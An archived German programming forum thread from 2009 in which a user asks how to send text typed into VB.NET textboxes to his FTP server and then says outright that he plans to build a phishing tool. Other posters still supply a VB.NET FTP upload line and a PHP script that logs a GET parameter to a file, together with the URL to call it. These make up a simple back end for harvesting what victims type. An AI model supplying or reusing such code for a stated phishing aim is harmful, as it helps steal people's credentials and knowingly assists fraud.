PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [VB.NET] etwas an einen ftp senden ???



HiddenFace
09.05.2009, 02:45
asloo ich wollte grad mal fragen ob mir einer helfen könnte..

http://img25.imageshack.us/my.php?image=unbenanntzblonp.jpg

ich möchte gerne das wenn ich etwas in die textboxen eingebe und den button klicke es dann in einer txt an meinen FTP gesended wird..

Hoffe ihr versthet was ich meine ^^

sry für die schrieb fehler bin sau lange wach und hab 3 kannen kaffe hinter mir....
Mfg

Sawyer
09.05.2009, 06:03
Also 1. Falsches Forum , es ist vb.net , also müsste es auch ins .net Forum
Aber einen ftp Upload umzusetzen ist in vb.net relativ leicht

z.B ganz einfach über die My Variablen: My.Computer.Network.UploadFile()

so würde es mit textboxein aussehen:
My.Computer.Network.UploadFile("C:\test.txt", "ftp://" & textbox1.text & "/" & "Zielname.txt", textbox2.text, textbox3.text)

MfG

Sirect
09.05.2009, 08:48
Ist aber nicht empfehlenswert.
Eine Solche Verbindung kann gesniffed werden.
Deshalb solltest du ein PHP-Skript auf deinem Server haben, welches Daten aus dem Get-Parameter an eine Datei anfügt.
Dann brauchst du nur einen Webclient und schon kannst du die Informationen SICHER auf deinen FTP übertragen.

HiddenFace
09.05.2009, 13:53
das mit dem php gedönst will ich ja ebend net ...ich will später daraus dann ein Phishing tool basteln

---------------------------------------------------------------------------

sry für die frage ^^

is VB2008 = vb.net ? cO

sry hab noch kein grossen pllan davon

bl0b
09.05.2009, 14:06
das mit dem php gedönst will ich ja ebend net ...ich will später daraus dann ein Phishing tool basteln

Ginge auch per PHP Script, dass die Daten per Parameter übernimmt. Aber für den Anfang tuts ein Programm mit FTP-Upload wohl.


VB2008 = vb.net

Normalerweise versteht man unter VB die 6. Version also VB 6. die Version aus dem Visual Studio 2008 ist eine neuere (meines Wissens die 9.) und basiert auf .NET (wie auch Visual C++ und C#)

Sirect
09.05.2009, 14:10
Aber für den Anfang tuts ein Programm mit FTP-Upload wohl.

Warum sollte er mit der schlechten Alternative anfangen, wenn die bessere kaum komplizierter ist?

jens3911
09.05.2009, 14:10
Ist aber nicht empfehlenswert.
Eine Solche Verbindung kann gesniffed werden.
Deshalb solltest du ein PHP-Skript auf deinem Server haben, welches Daten aus dem Get-Parameter an eine Datei anfügt.
Dann brauchst du nur einen Webclient und schon kannst du die Informationen SICHER auf deinen FTP übertragen.

kannst du das script mal posten?

hpoc
09.05.2009, 14:14
Lern mal bitte Deutsch/Englisch!

Sirect
09.05.2009, 14:20
Frei Hand:



<?php
$data = $_GET['str'];
$handle = fopen ("log.txt", "a");
fwrite($handle, $data."\n");
?>


Dann einfach mit einem Webclient "DownloadString' aufrufen.


WEBSPACE.DE/script.php?str=TEXTHIER